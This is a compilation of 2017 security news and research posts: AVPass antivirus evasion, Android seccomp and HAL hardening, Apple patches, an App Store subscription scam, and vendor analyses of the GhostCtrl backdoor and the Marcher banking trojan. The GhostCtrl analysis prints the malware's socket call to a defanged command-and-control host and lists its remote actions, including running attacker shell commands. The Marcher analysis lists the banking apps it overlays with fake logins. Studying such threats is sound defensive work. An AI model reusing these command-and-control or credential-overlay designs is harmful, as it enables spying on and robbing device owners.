Antivirus for Android Has a Long, Long Way To Go

Antivirus programs on PCs have a mixed track record. While generally useful, they still have to play catch-up with evolving threats–and their deep system access has on occasion enabled even worse attacks. Now, as antivirus products gain in popularity for Android devices, they appear to be making many of the same old mistakes.

A key part of the current shortcomings stems from relative immaturity in Android antivirus offerings. Researchers at Georgia Tech who analyzed 58 mainstream options found that many were relatively easy to defeat, often because didn’t take a nuanced and diverse approach to malware detection. Taking on the mindset of an attacker, the researchers built a tool called AVPass that works to smuggle malware into a system without being detected by antivirus. Of the 58 programs AVPass tested, only two–from AhnLab and WhiteArmor–consistently stopped AVPass attacks.

“Antivirus for the mobile platform is really just starting for some companies—a lot of the antivirus for Android may even be their first iteration,” says Max Wolotsky, a PhD student at Georgia Tech who worked on the research. “We would definitely warn consumers that they should look into more than just AV. You want to be cautious.”

Modern antivirus uses machine-learning techniques to evolve with the malware field. So in creating AVPass, the researchers started by developing methods for defeating defensive algorithms they could access (like those created for academic research or other open-source projects) and then used these strategies as the basis for working out attacks against proprietary consumer antivirus—products where you can’t see the code powering them. The team will present on and release AVPass at the Black Hat hacking conference in Las Vegas on Thursday.

Free Pass

To test the 58 Android antivirus products and figure out what bypasses would work against each of them, the researchers used a service called VirusTotal, which attempts to identify links and malware samples by scanning them through a system that incorporates dozens of tools, and offering results about what each tool found. By querying VirusTotal with different malware components and seeing which tools flagged which samples, the researchers were able to form a picture of the type of detection features each antivirus has. Under an academic license, VirusTotal limited the group to fewer than 300 queries per malware sample, but the researchers say even this small number was adequate for gathering data on how the different services go about detecting malware.

Before this reconnaissance, the team developed a feature for AVPass called Imitation Mode, which shields the test samples submitted for antivirus scanning so the snippets themselves wouldn’t be identified and blacklisted. “The Imitation Mode is for our malware obfuscation,” says Chanil Jeon, another researcher who worked on the project. “We extract particular malware features and insert them into an empty app, so we can test which feature or which combination is important for malware detection." The team worked with mainstream malware samples from malware libraries like VirusShare.com and DREBIN.

AVPass is an open source prototype, part of broader Georgia Tech research into machine-learning algorithms (like those used in antivirus) and the extent to which they can be manipulated and exploited. But it also serves as commentary on the evolving landscape of mobile defense.

Room To Grow

If there’s a silver lining here, it’s that Android antivirus tools have an easier job than their PC equivalents, at least for now. "Android malware is not much of malware at all compared to PC malware," says Mohammad Mannan, a security researcher at Concordia University in Montreal who has studied antivirus vulnerabilities. "They are just rogue apps in most cases, so they are far easier to detect." And Mannan notes that though Android antivirus apps have a lot of leeway in the system, they aren’t as privileged as antivirus apps on PCs, which could potentially cut down on concerns that antivirus can sometimes be exploited as a security vulnerability in itself. "Mobile AVs run like a privileged app, but are still just an app in the end, not part of the operating system or kernel," he says.

For now, though, the potential advantages seem overshadowed by the immaturity of the market. The AVPass team says that Android antivirus developers need to build out their products so the programs are looking for multiple malicious attributes at once. It’s much easier to sneak past one security guard than 10. And they note that their research would have been much more difficult and time-consuming if tools like VirusTotal were less specific in the information they disclose about each service.

"These results aren’t the most surprising," Wolotsky says. "We knew going into this as security researchers that the mobile domain is much less advanced. We hope AVPass will give [antivirus developers] a way to see what works and what doesn’t, because I’m not sure they’ve had that."

from WIRED http://ift.tt/2ukl370

Seccomp filter in Android O

Posted by Paul Lawrence, Android Security Engineer

In Android-powered devices, the kernel does the heavy lifting to enforce the
Android security model. As the security team has worked to harden Android’s
userspace and isolate and deprivilege processes, the kernel has become the focus
of more security attacks. System calls are a common way for attackers to target
the kernel.

All Android software communicates with the Linux kernel using system calls, or
syscalls for short. The kernel provides many device- and SOC-specific syscalls
that allow userspace processes, including apps, to directly interact with the
kernel. All apps rely on this mechanism to access collections of behavior
indexed by unique system calls, such as opening a file or sending a Binder
message. However, many of these syscalls are not used or officially supported by
Android.

Android O takes advantage of a Linux feature called seccomp that
makes unused system calls inaccessible to application software. Because these
syscalls cannot be accessed by apps, they can’t be exploited by potentially
harmful apps.

seccomp filter

Android O includes a single seccomp filter installed into zygote, the process
from which all the Android applications are derived. Because the filter is
installed into zygote—and therefore all apps—the Android security team took
extra caution to not break existing apps. The seccomp filter allows:

  • all the syscalls exposed via bionic (the C runtime for Android). These are
    defined in bionic/libc/SYSCALLS.TXT.
  • syscalls to allow Android to boot
  • syscalls used by popular Android applications, as determined by running
    Google’s full app compatibility suite

Android O’s seccomp filter blocks certain syscalls, such as swapon/swapoff,
which have been implicated in some security attacks, and the key control
syscalls, which are not useful to apps. In total, the filter blocks 17 of 271
syscalls in arm64 and 70 of 364 in arm.

Developers

Test your app for illegal syscalls on a device running Android O.

Detecting an illegal syscall

In Android O, the system crashes an app that uses an illegal syscall. The log
printout shows the illegal syscall, for example:

03-09 16:39:32.122 15107 15107 I crash_dump32: performing dump of process 14942 (target tid = 14971)
03-09 16:39:32.127 15107 15107 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
03-09 16:39:32.127 15107 15107 F DEBUG   : Build fingerprint: 'google/sailfish/sailfish:O/OPP1.170223.013/3795621:userdebug/dev-keys'
03-09 16:39:32.127 15107 15107 F DEBUG   : Revision: '0'
03-09 16:39:32.127 15107 15107 F DEBUG   : ABI: 'arm'
03-09 16:39:32.127 15107 15107 F DEBUG   : pid: 14942, tid: 14971, name: WorkHandler  >>> com.redacted <<<
03-09 16:39:32.127 15107 15107 F DEBUG   : signal 31 (SIGSYS), code 1 (SYS_SECCOMP), fault addr --------
03-09 16:39:32.127 15107 15107 F DEBUG   : Cause: seccomp prevented call to disallowed system call 55
03-09 16:39:32.127 15107 15107 F DEBUG   :     r0 00000091  r1 00000007  r2 ccd8c008  r3 00000001
03-09 16:39:32.127 15107 15107 F DEBUG   :     r4 00000000  r5 00000000  r6 00000000  r7 00000037

Affected developers should rework their apps to not call the illegal syscall.

Toggling seccomp filters during testing

In addition to logging errors, the seccomp installer respects setenforce on
devices running userdebug and eng builds, which allows you to test whether
seccomp is responsible for an issue. If you type:

adb shell setenforce 0 && adb stop && adb start

then no seccomp policy will be installed into zygote. Because you cannot remove
a seccomp policy from a running process, you have to restart the shell for this
option to take effect.

Device manufacturers

Because Android O includes the relevant seccomp filters at
//bionic/libc/seccomp, device manufacturers don’t need to do any
additional implementation. However, there is a CTS test that checks for seccomp
at
//cts/tests/tests/security/jni/android_security_cts_SeccompTest.cpp.
The test checks that add_key and keyctl syscalls are
blocked and openat is allowed, along with some app-specific
syscalls that must be present for compatibility.

from Android Developers Blog http://ift.tt/2uexEqq

Apple hurls out patches for dozens of security holes in iOS, macOS

Apple has today released patches addressing roughly four dozen exploitable security vulnerabilities in iOS, macOS, and WatchOS.

The iOS 10.3.3 update resolves 47 flaws for the iPhone, iPad and iPod Touch, including multiple remote code execution holes in the WebKit browser engine. Fixes were also posted for the Apple Watch’s WatchOS firmware.

Of the CVE-listed flaws in the update, 23 were found in WebKit, the browser engine Apple uses for iOS and Safari. Those include 16 memory corruption errors that could be exploited for remote code execution via a malicious webpage.

One of those memory corruption bugs, CVE-2017-7055, was reported to Apple by the UK National Cyber Security Centre, a branch of the GCHQ spying nerve center. As usual, bug hunters with Google’s Project Zero were also well represented, with Ian Beer, lokihardt, and Ivan Fratric credited for discovering multiple flaws.

Other notable vulnerabilities include CVE-2017-7060, a bug in Safari Printing that allows an attacker to freeze the browser by flooding it with print dialogue boxes. Discovery of that bug was credited to Travis Kelley, with the City of Mishawaka, Indiana.

Also addressed were flaws that allow attackers to crash the Messages app (CVE-2017-7063), and bugs in the iOS Kernel that allow an application to remotely execute code or access restricted memory space.

Meanwhile, Mac users will need to update their systems as well, thanks to a fresh crop of security fixes for OS X Sierra, El Capitan, and Yosemite. Those updates include a half-dozen CVE-listed vulnerabilities in the Intel Graphics Driver that allow applications to execute arbitrary code at the kernel level and view restricted memory addresses.

Also included in the update were multiple flaws in the macOS Kernel and a flaw in the Wi-Fi protocol (CVE-2017-9417) for both iOS and OS X that allow an attacker to "execute arbitrary code on the Wi-Fi chip." That bug, also present on the Apple Watch and Apple TV, was credited to Nitay Artenstein of Exodus Intelligence.

A separate update for the Safari browser on MacOS includes many of the WebKit fixes from the iOS update, including multiple remote code execution flaws that could be exploited via malicious webpages.

Moving on to the less-popular Apple products, the WatchOS, tvOS and Windows versions of iTunes and iCloud also received updates for vulnerabilities, including the WebKit remote code execution flaws.

In short, fire up your software update tool, download, install, reboot. ®

from The Register http://ift.tt/2u9KYwg

Shut the HAL Up

Posted by Jeff Vander Stoep, Senior Software Engineer, Android Security

Updates are essential for security, but they can be difficult and expensive for
device manufacturers. Project
Treble
is making updates easier by separating the underlying vendor
implementation from the core Android framework. This modularization allows
platform and vendor-provided components to be updated independently of each
other. While easier and faster updates are awesome, Treble’s increased
modularity is also designed to improve security.

Isolating HALs

A Hardware
Abstraction Layer
(HAL) provides an interface between device-agnostic code
and device-specific hardware implementations. HALs are commonly packaged as
shared libraries loaded directly into the process that requires hardware
interaction. Security boundaries are enforced at the process level. Therefore,
loading the HAL into a process means that the HAL is running in the same
security context as the process it’s loaded into.

The traditional method of running HALs in-process means that the process needs
all the permissions required by each in-process HAL, including direct access to
kernel drivers. Likewise, all HALs in a process have access to the same set of
permissions as the rest of the process, including permissions required by other
in-process HALs. This results in over-privileged processes and HALs that have
access to permissions and hardware that they shouldn’t.

Figure 1. Traditional method of multiple HALs in one process.

Moving HALs into their own processes better adheres to the principle of
least privilege
. This provides two distinct advantages:

  1. Each HAL runs in its own sandbox and is permitted access to only the
    hardware driver it controls and the permissions granted to the process are
    limited to the permissions required to do its job.

  2. Similarly, the process loses access to hardware drivers and other
    permissions and capabilities needed by the HALs.
Figure 2. Each HAL runs in its own process.

Moving HALs into their own processes is great for security, but it comes at the
cost of increased IPC overhead between the client process and the HAL. Improvements to the binder
driver
made IPC between HALs and clients practical. Introducing
scatter-gather into binder improves the performance of each transaction by
removing the need for the serialization/deserialization steps and reducing the
number of copy operations performed on data from three down to one. Android O
also introduces binder domains to provide separate communication streams for
vendor and platform components. Apps and the Android frameworks continue to use
/dev/binder, but vendor-provided components now use /dev/vndbinder.
Communication between the platform and vendor components must use /dev/hwbinder.
Other means of IPC between platform and vendor are disallowed.

Case study: System Server

Many of the services offered to apps by the core Android OS are provided by the
system server. As Android has grown, so has system server’s responsibilities and
permissions, making it an attractive target for an attacker.
As part of project Treble, approximately 20 HALs were moved out of system
server, including the HALs for sensors, GPS, fingerprint, Wi-Fi, and more.
Previously, a compromise in any of those HALs would gain privileged system
permissions, but in Android O, permissions are restricted to the subset needed
by the specific HAL.

Case study: media frameworks

Efforts to harden
the media stack
in Android Nougat continued in Android O. In Nougat,
mediaserver was split into multiple components to better adhere to the principle
of least privilege, with audio hardware access restricted to audioserver, camera
hardware access restricted to cameraserver, and so on. In Android O, most direct
hardware access has been entirely removed from the media frameworks. For example
HALs for audio, camera, and DRM have been moved out of audioserver,
cameraserver, and drmserver respectively.

Reducing and isolating the attack surface of the kernel

The Linux kernel is the primary enforcer of the security model on Android.
Attempts to escape sandboxing mechanisms often involve attacking the kernel. An
analysis
of kernel vulnerabilities on Android showed that they overwhelmingly occurred in
and were reached through hardware drivers.

De-privileging system server and the media frameworks is important because they
interact directly with installed apps. Removing direct access to hardware
drivers makes bugs difficult to reach and adds another layer of defense to
Android’s security model.

from Android Developers Blog http://ift.tt/2veReTw

Android Backdoor GhostCtrl can Silently Record Your Audio, Video, and More

by Lenart Bermejo, Jordan Pan, and Cedric Pernet

The information-stealing RETADUP worm that affected Israeli hospitals is actually just part of an attack that turned out to be bigger than we first thought—at least in terms of impact. It was accompanied by an even more dangerous threat: an Android malware that can take over the device.

Detected by Trend Micro as ANDROIDOS_GHOSTCTRL.OPS / ANDROIDOS_GHOSTCTRL.OPSA, we’ve named this Android backdoor GhostCtrl as it can stealthily control many of the infected device’s functionalities.

There are three versions of GhostCtrl. The first stole information and controlled some of the device’s functionalities without obfuscation, while the second added more device features to hijack. The third iteration combines the best of the earlier versions’ features—and then some. Based on the techniques each employed, we can only expect it to further evolve.

GhostCtrl is literally a ghost of itself
GhostCtrl is also actually a variant (or at least based on) of the commercially sold, multiplatform OmniRAT that made headlines in November 2015. It touts that it can remotely take control of Windows, Linux, and Mac systems at the touch of an Android device’s button—and vice versa. A lifetime license for an OmniRAT package costs between US $25 and $75. Predictably OmniRAT cracking tutorials abound in various underground forums, and some its members even provide patchers for it.

There’s actually a red flag that shows how the malicious APK is an OmniRAT spinoff. Given that it’s a RAT as a service, this can be modified (or removed) during compilation.


Figure 1: Snapshot of GhostCtrl version 3’s resources.arsc file indicating it’s an OmniRAT variant (highlighted)

GhostCtrl is hauntingly persistent
The malware masquerades as a legitimate or popular app that uses the names App, MMS, whatsapp, and even Pokemon GO. When the app is launched, it base64-decodes a string from the resource file and writes it down, which is actually the malicious Android Application Package (APK).

The malicious APK, after dynamically clicked by a wrapper APK, will ask the user to install it. Avoiding it is very tricky: even if the user cancels the “ask for install page” prompt, the message will still pop up immediately. The malicious APK doesn’t have an icon. Once installed, a wrapper APK will launch a service that would let the main, malicious APK run in the background:


Figure 2: How the wrapper APK leads to the main APK

The main APK has backdoor functions usually named com.android.engine to mislead the user into thinking it’s a legitimate a system application. The malicious APK will then connect to the C&C server to retrieve commands via the socket (an endpoint for communication between machines), new Socket(“hef–klife[.]ddns.net”, 3176).

GhostCtrl can possess the infected device to do its bidding
The commands from the C&C server are encrypted and locally decrypted by the APK upon receipt. Interestingly, we also found that the backdoor connects to a domain rather than directly connecting to the C&C server’s IP address. This can be an attempt to obscure their traffic. We also found several Dynamic Name Servers (DNS), which at some point led to the same C&C IP address:

  • hef–klife[.]ddns[.]net
  • f–klife[.]ddns[.]net
  • php[.]no-ip[.]biz
  • ayalove[.]no-ip[.]biz

A notable command contains action code and Object DATA, which enables attackers to specify the target and content, making this a very flexible malware for cybercriminals. This is the command that allows attackers to manipulate the device’s functionalities without the owner’s consent or knowledge.

Here’s a list of some of the action codes and what each does to the device:

  • ACTION CODE =10, 11: Control the Wi-Fi state
  • ACTION CODE= 34: Monitor the phone sensors’ data in real time
  • ACTION CODE= 37: Set phone’s UiMode, like night mode/car mode
  • ACTION CODE= 41: Control the vibrate function, including the pattern and when it will vibrate
  • ACTION CODE= 46: Download pictures as wallpaper
  • ACTION CODE= 48: List the file information in the current directory and upload it to the C&C server
  • ACTION CODE= 49: Delete a file in the indicated directory
  • ACTION CODE= 50: Rename a file in the indicated directory
  • ACTION CODE= 51: Upload a desired file to the C&C server
  • ACTION CODE= 52: Create an indicated directory
  • ACTION CODE= 60: Use the text to speech feature (translate text to voice/audio)
  • ACTION CODE= 62: Send SMS/MMS to a number specified by the attacker; the content can also be customized
  • ACTION CODE= 68: Delete browser history
  • ACTION CODE= 70: Delete SMS
  • ACTION CODE= 74: Download file
  • ACTION CODE= 75: Call a phone number indicated by the attacker
  • ACTION CODE= 77: Open activity view-related apps; the Uniform Resource Identifier (URI) can also be specified by the attacker (open browser, map, dial view, etc.)
  • ACTION CODE= 78: Control the system infrared transmitter
  • ACTION CODE= 79: Run a shell command specified by the attacker and upload the output result

Another unique C&C command is an integer-type command, which is responsible for stealing the device’s data. Different kinds of sensitive—and to cybercriminals, valuable—information will be collected and uploaded, including call logs, SMS records, contacts, phone numbers, SIM serial number, location, and browser bookmarks.

The data GhostCtrl steals is extensive, compared to other Android info-stealers. Besides the aforementioned information types, GhostCtrl can also pilfer information like Android OS version, username, Wi-Fi, battery, Bluetooth, and audio states, UiMode, sensor, data from camera, browser, and searches, service processes, activity information, and wallpaper.

It can also intercept text messages from phone numbers specified by the attacker. Its most daunting capability is how it can surreptitiously record voice or audio, then upload it to the C&C server at a certain time. All the stolen content will be encrypted before they’re uploaded to the C&C server.


Figure 3: Code snapshot showing how some information will be deleted after upload

Figure 4: Most of the related function codes for stealing information are in the “transfer” package.

The other C&C commands are self-defined, such as “account”, “audioManager”, and “clipboard”. These commands will trigger malicious routines. It’s worth noting that these aren’t commonly seen in Android RATs:

  • Clearing/resetting the password of an account specified by the attacker
  • Getting the phone to play different sound effects
  • Specify the content in the Clipboard
  • Customize the notification and shortcut link, including the style and content
  • Control the Bluetooth to search and connect to another device
  • Set the accessibility to TRUE and terminate an ongoing phone call

How do GhostCtrl’s versions stack up to each other?
GhostCtrl’s first version has a framework that enables it to gain admin-level privilege. While it had no function codes at the time, the second version did. The features to be hijacked also incrementally increased as the malware evolved into its second and third iterations.


Figure 5: Framework of GhostCtrl’s first version for gaining admin-level privilege


Figure 6: Comparison of backdoor function of the first (left) and second (right) versions


Figure 7: Code snapshot of GhostCtrl’s second version applying device admin privileges

GhostCtrl’s second version can also be a mobile ransomware. It can lock the device’s screen and reset its password, and also root the infected device. It can also hijack the camera, create a scheduled task of taking pictures or recording video, then surreptitiously upload them to the C&C server as mp4 files.


Figure 8: Code snapshot showing GhostCtrl’s ransomware-like capability


Figure 9: Code snapshot showing how GhostCtrl roots the infected device

The third version of GhostCtrl incorporates obfuscation techniques to hide its malicious routines, as shown below:


Figure 10: The attack chain of GhostCtrl’s third version

In GhostCtrl’s third version, the wrapper APK first drops a packed APK. The latter unpacks the main APK, a Dalvik executable (DEX), and an Executable and Linkable Format file (ELF). The DEX and ELF files decrypt strings and Application Programming Interface (API) calls in the main malicious APK in runtime. This longwinded attack chain helps make detection more challenging, exacerbated by the fact that the wrapper APK hides the packed APK as well as DEX and ELF files in the assets directory.

Mitigation
GhostCtrl’s combination with an information-stealing worm, while potent, is also telling. The attackers tried to cover their bases, and made sure that they didn’t just infect endpoints. And with the ubiquity of mobile devices among corporate and everyday end users, GhostCtrl’s capabilities can indeed deliver the scares.

But more than its impact, GhostCtrl underscores the importance of defense in depth. Multilayered security mechanisms should be deployed so that the risks to data are better managed. Some of the best practices that information security professionals and IT/system administrators can adopt to secure bring-your-own devices (BYOD) include:

  • Keep the device updated; Android patching is fragmented and organizations may have custom requirements or configurations needed to keep the device updated, so enterprises need to balance productivity and security
  • Apply the principle of least privilege—restrict user permissions for BYOD devices to prevent unauthorized access and installation of dubious apps
  • Implement an app reputation system that can detect and block malicious and suspicious apps
  • Deploy firewalls, intrusion detection, and prevention systems at both the endpoint and mobile device levels to preempt the malware’s malicious network activities
  • Enforce and strengthen your mobile device management policies to further reduce potential security risks
  • Employ encryption, network segmentation and data segregation to limit further exposure or damage to data
  • Regularly back up data in case of device loss, theft, or malicious encryption

 

Trend Micro Solutions
End users and enterprises can also benefit from multilayered mobile security solutions such as Trend MicroMobile Security for Android™ which is also available on Google Play.

Trend MicroMobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning, as well as protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.

A list of all the hashes (SHA-256) detected as ANDROIDOS_GHOSTCTRL.OPS/ANDROIDOS_GHOSTCTRL.OPSA is in this appendix.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Android Backdoor GhostCtrl can Silently Record Your Audio, Video, and More

from TrendLabs Security Intelligence Blog http://ift.tt/2uqod9X

New Android Marcher Variant Posing as Adobe Flash Player Update

Introduction

Marcher is sophisticated banking malware that steals users’ financial information, such as online banking credentials and credit card details. We have observed Marcher evolving over time, using new tricks and payload delivery mechanisms. As we reported about previous encounters with this malware here, here, and here, the authors are using new techniques to spread infections, such as pornographic lures and the hype around new games.

In a recent wave, we are seeing the malware payloads disguised as Adobe Flash player. Upon opening the dropper URL, the user will be prompted by a message saying the device’s Flash Player is out of date, and the malware “Adobe_Flash_2016.apk” will be dropped on the user’s device. The malware will also guide the user to disable security and allow third-party apps to install, as shown in the screen below.

Fig 1: Payload delivery

We saw multiple payloads being served where popcash.net ads were the initial source of infection.  

Fig 2: New Android Marcher wave

Upon installation, the malware quickly hides and removes its icon from the phone menu.

Following infection, the malware will register the infected device to its Command & Control (C&C) server. Along with the device’s meta information, the installed apps list is sent to the C&C server as shown below.

Fig 3: C&C communication

 
After a few sleep cycles, the malware waits for the user to open an app from its targeted list. We found that this variant is capable of targeting over 40 financial apps. When the user opens any of the targeted apps, the malware will quickly overlay a fake login page, which lures the victim into supplying user credentials. Some of the overlay pages are shown below.

Fig 4: Fake login pages
 
Unlike Marcher malware we’ve seen in the past, this variant maintains a JavaScript Object Notation (JSON) file that lists each targeted app and its fake login page hosting URL. This list is hardcoded in the malware payload. A screen capture is shown below.

Fig 5: Targeted apps list with the associated URLs that serve the overlay pages

The following is a list of financial apps targeted by the new Marcher variant:

  • com.android.vending
  • org.morgbigorg.nonem
  • com.google.android.gm
  • com.yahoo.mobile.client.android.mail
  • com.htc.android.mail
  • com.android.email
  • com.paypal.android.p2pmobile
  • com.chase.sig.android
  • com.suntrust.mobilebanking
  • com.wf.wellsfargomobile
  • com.citi.citimobile
  • com.konylabs.capitalone
  • com.infonow.bofa
  • com.morganstanley.clientmobile.prod
  • com.amazon.mShop.android.shopping
  • com.htsu.hsbcpersonalbanking
  • com.usaa.mobile.android.usaa
  • com.schwab.mobile
  • com.americanexpress.android.acctsvcs.us
  • com.pnc.ecommerce.mobile
  • com.regions.mobbanking
  • com.clairmail.fth
  • com.grppl.android.shell.BOS
  • com.tdbank
  • com.huntington.m
  • com.citizensbank.androidapp
  • com.usbank.mobilebanking
  • com.key.android
  • com.ally.MobileBanking
  • com.unionbank.ecommerce.mobile.android
  • com.mfoundry.mb.android.mb_BMOH071025661
  • com.bbt.cmol
  • com.sovereign.santander
  • com.mtb.mbanking.sc.retail.prod
  • com.fi9293.godough
  • com.circle.android
  • com.coinbase.android
  • com.walmart.android
  • com.bestbuy.android
  • com.gyft.android
  • com.commbank.netbank
  • org.westpac.bank
  • au.com.nab.mobile
  • org.stgeorge.bank
  • com.facebook.katana
  • com.moneybookers.skrillpayments
  • com.westernunion.android.mtapp
  • au.com.ingdirect.android
  • au.com.bankwest.mobile
  • org.banksa.bank
  • com.ebay.mobile
  • com.ebay.gumtree.au
  • com.anz.android.gomoney
  • com.anz.android

Unlike other Marcher malware, this variant is highly obfuscated, which explains the low antivirus (AV) detection rate. The VirusTotal screen capture below shows that less than 20 percent of AV scanners detected the new variant (at the time of the scan).

VT: 11/59 (at the time of analysis)

Fig 6: VT detection

 

Fig 7: Obfuscated code
 
The overlay (fake) login pages for the financial apps are hosted remotely, allowing the author to update them as needed. In the sample C&C communication shown below, the user on the infected device tries to launch the Commonwealth Bank of Australia app; it gets intercepted by the Marcher Trojan, which loads an overlay login page from a remote location.

Fig 8: Serving fake page in server response

If the user falls for the fake login page and enters his or her banking credentials, the Marcher Trojan relays the information to the C&C server, as shown in the screenshot below.

Fig 9: Credential harvesting

Conclusion

We have been seeing regular infection attempts for this Marcher variant in the past month. The frequent changes in the Marcher family indicate that the malware remains an active and prevalent threat to Android devices.

To avoid being a victim of such malware, be sure to download apps only from trusted app stores, such as Google Play. By unchecking the “Unknown Sources” option under the “Security” settings of your device, you can prevent inadvertent downloads from questionable sources.

Zscaler ThreatLabZ is actively monitoring Android Marcher and its variants to ensure that Zscaler customers are protected.

Indicators of compromise (IOCs):

Dropper URLs

C&Cs:

from Zscaler Research http://ift.tt/2sZpapF

Report Reveals In-App Purchase Scams in the App Store

An investigation into App Store developer pay-outs has uncovered a scamming trend in which apps advertising fake services are making thousands of dollars a month from in-app purchases.

In a Medium article titled How to Make $80,000 Per Month on the Apple App Store, Johnny Lin describes how he discovered the trend, which works by manipulating search ads to promote dubious apps in the App Store and then preys on unsuspecting users via the in-app purchase mechanism.

I scrolled down the list in the Productivity category and saw apps from well-known companies like Dropbox, Evernote, and Microsoft. That was to be expected. But what’s this? The #10 Top Grossing Productivity app (as of June 7th, 2017) was an app called "Mobile protection :Clean & Security VPN".

Given the terrible title of this app (inconsistent capitalization, misplaced colon, and grammatically nonsensical "Clean & Security VPN?"), I was sure this was a bug in the rankings algorithm. So I check Sensor Tower for an estimate of the app’s revenue, which showed… $80,000 per month?? That couldn’t possibly be right. Now I was really curious.

To learn how this could be, Lin installed and ran the app, and was soon prompted to start a "free trial" for an "anti-virus scanner" (iOS does not need anti-virus software thanks to Apple’s sandboxing rules for individual apps). Tapping on the trial offer then threw up a Touch ID authentication prompt containing the text "You will pay $99.99 for a 7-day subscription starting Jun 9, 2017".



Lin was one touch away from paying $400 a month for a non-existent service offered by a scammer.

It suddenly made a lot of sense how this app generates $80,000 a month. At $400/month per subscriber, it only needs to scam 200 people to make $80,000/month, or $960,000 a year. Of that amount, Apple takes 30%, or $288,000 — from just this one app.

Lin went on to explain how dishonorable developers are able to take advantage of Apple’s App Store search ads product because there’s no filtering or approval process involved. Not only that, ads look almost indistinguishable from real results in the store, while some ads take up the entire search result’s first page.

Lin dug deeper and found several other similar apps making money off the same scam, suggesting a wider disturbing trend, with scam apps regularly showing up in the App Store’s top grossing lists.

It’s unclear at this point how these apps managed to make it onto the App Store in the first place given Apple’s usually stringent approval process, or whether changes to the search ads system in iOS 11 will prevent this immoral practice from occurring. We’ll be sure to update this article if we hear more from Apple.

In the meantime, users should report scam apps when they see them and inform less savvy friends of this scamming trend until something is done to eradicated it.

Discuss this article in our forums

from MacRumors : Mac News and Rumors http://ift.tt/2stef6D